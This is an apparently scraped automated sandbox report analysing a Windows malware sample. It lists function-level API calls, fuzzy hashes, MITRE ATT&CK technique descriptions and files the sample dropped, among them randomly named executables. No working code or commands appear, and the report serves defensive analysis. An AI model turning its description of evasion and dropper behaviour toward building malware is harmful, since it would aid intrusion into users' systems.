Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: 5d15bbd30a47c6d17800168533ee239e179db2e0dc465f54d492261b867efbf5
Instruction ID: 4ad4e372e5b68931af811a4e6266c2607be618843bc6583e8c633331fff85839
Opcode Fuzzy Hash: 5d15bbd30a47c6d17800168533ee239e179db2e0dc465f54d492261b867efbf5
Instruction Fuzzy Hash: 97117936940208AFCB719F18ED4885A7BA9FB84731711802AF89C87120D730ADC6FB62

Function 00F71B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00F71BCD
rand.MSVCRT ref: 00F71BD8
memset.MSVCRT ref: 00F71C43
memcpy.MSVCRT ref: 00F71C4F
lstrcat.KERNEL32(?,.exe), ref: 00F71C5D

Strings

ZuotMwaOQaRPomfbNzfpNJexRkbpUuCCMhVEyqeLeVEUsBvdXcSDMnLtFAZOxGKpvngzrIiHDixYWsluZoNahqAKryPYItXBTJHcrDjWmkqijdKIOSyPHBWUgGQnGfATlVFYzQhlgTbcsXwCEwmFJSRdkjvL, xrefs: 00F71B8A, 00F71B9C, 00F71C15, 00F71C49
.exe, xrefs: 00F71C57

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$ZuotMwaOQaRPomfbNzfpNJexRkbpUuCCMhVEyqeLeVEUsBvdXcSDMnLtFAZOxGKpvngzrIiHDixYWsluZoNahqAKryPYItXBTJHcrDjWmkqijdKIOSyPHBWUgGQnGfATlVFYzQhlgTbcsXwCEwmFJSRdkjvL
API String ID: 122620767-2855320921
Opcode ID: d451252386eaa91195f02c94bce57c5840d0ec75b25b713314f10f30d379273d
Instruction ID: 72a79bca4c40967c752227a5c1a20af89d3955dfb87244b976272be4b0150967
Opcode Fuzzy Hash: d451252386eaa91195f02c94bce57c5840d0ec75b25b713314f10f30d379273d
Instruction Fuzzy Hash: D0210422F442906EE236133D6C41FA93A44AFE3731F1680ABF5CD1A192D2681DC9B273

Function 00F7189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00F718B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,771B0F00,75A38400), ref: 00F718D3
CloseHandle.KERNEL32(00F72549), ref: 00F718E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F718F0
GetExitCodeProcess.KERNEL32(?,00F72549), ref: 00F71901
CloseHandle.KERNEL32(?), ref: 00F7190A

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID:
API String ID: 876959470-0
Opcode ID: 94c649363668452d8f365d5dd7387886f1db106bac26d831bc654f065d2b88a4
Instruction ID: 890f6c18498c3cce376debe6a806459032e3e357e12a7b61821605987a3a1183
Opcode Fuzzy Hash: 94c649363668452d8f365d5dd7387886f1db106bac26d831bc654f065d2b88a4
Instruction Fuzzy Hash: F601717290112CBBCB216B95DC48DDF7F3DFF85734F104022FA19A51A0D6318A58EAA2

Function 00F71319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00F71334
GetProcAddress.KERNEL32(00000000), ref: 00F7133B
memset.MSVCRT ref: 00F71359

Strings

ntdll.dll, xrefs: 00F7132F
NtSystemDebugControl, xrefs: 00F7132A

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 9632fe91984205857f4499140376e76b89672ad2178af5ef7bbcd9a0291e2b0a
Instruction ID: 9afdd32acb5a5eca3b21d2c5a42e43061cbacc40304ede38f619a4ec655f39fc
Opcode Fuzzy Hash: 9632fe91984205857f4499140376e76b89672ad2178af5ef7bbcd9a0291e2b0a
Instruction Fuzzy Hash: 21016171A0030DFFDB50DF98AC8596FBBB9FB55728F00812BF909A1140D3709659EA53

Function 00F71DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00F71E0B
lstrcpy.KERNEL32(?,00000001), ref: 00F71E1C
strrchr.MSVCRT ref: 00F71E2B
lstrcmpiA.KERNEL32(?,00F74488), ref: 00F71E48
lstrlen.KERNEL32(00F74488), ref: 00F71E53

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: c2689ab3a171b92a7ab9864e4aa940febd5bbd0ea56ed3d5ea51b1ef50d7e293
Instruction ID: c492f16edd4b6491380ecc8267d540db448f08e80659d05c8af7b07b3035e2af
Opcode Fuzzy Hash: c2689ab3a171b92a7ab9864e4aa940febd5bbd0ea56ed3d5ea51b1ef50d7e293
Instruction Fuzzy Hash: D201A772D042197FDB105B64DC48B96779DAB05324F044066E949D2090D674AAC8AB92

Function 00F7185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00F71F92,00000000,?,00000000,?,?,?,00F71F92,?,00000000,00000002), ref: 00F71867
srand.MSVCRT ref: 00F71878
rand.MSVCRT ref: 00F71880
srand.MSVCRT ref: 00F71890
rand.MSVCRT ref: 00F71894

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: 72a99a6754722c8c051a80fd0d2ed3df82752622f784b953ceaec13577d9fe1f
Instruction ID: 04cda9da1b918de952780c6bfd3cab0b5cc097f2401472ece9119c3c3e1646c6
Opcode Fuzzy Hash: 72a99a6754722c8c051a80fd0d2ed3df82752622f784b953ceaec13577d9fe1f
Instruction Fuzzy Hash: 3CE0DF77A0421CBBDB00A7F9EC468DEBBACEE84165B100527F604E3250E970FD849AB4

Function 00F76014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00F7603C
GetProcAddress.KERNEL32(00000000,00F76064), ref: 00F7604F

Strings

kernel32.dll, xrefs: 00F7603B

Memory Dump Source

Source File: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 401c2c01c8857bc5713b3a89633ce85e2c2ddb5732c8b05886939e2f99af2845
Instruction ID: d83ddbcc587c80d3b445688f2e38a87ce5abfc6860829b9a916553da0efc2497
Opcode Fuzzy Hash: 401c2c01c8857bc5713b3a89633ce85e2c2ddb5732c8b05886939e2f99af2845
Instruction Fuzzy Hash: 58F0F6B15402898FDF70CE64CC44BDE3BE4EB05710F50846BE90DCB241CB3486059B16

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report biKy3nZEyJ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_TJytnf.exe_bf4cc6b994b3c313b3d8ecc28fe7af8bd1d8_fcda0e7d_16be80c0-2d6f-460e-b66d-89c9b7c0acb9\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D88.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER324B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER326C.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k2[1].rar

C:\Users\user\AppData\Local\Temp\27401EC2.exe

C:\Users\user\AppData\Local\Temp\29897C01.exe

C:\Users\user\AppData\Local\Temp\TJytnf.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

Windows Analysis Report
biKy3nZEyJ.exe

Function 00740044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Function 0044B180 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 292
COMMON

Function 00447880 Relevance: 6.3, APIs: 4, Instructions: 316
COMMON

Function 0044A2E0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 316
COMMON

Function 00446D40 Relevance: 5.2, APIs: 4, Instructions: 173
COMMON

Function 00F729E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Function 00F71099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON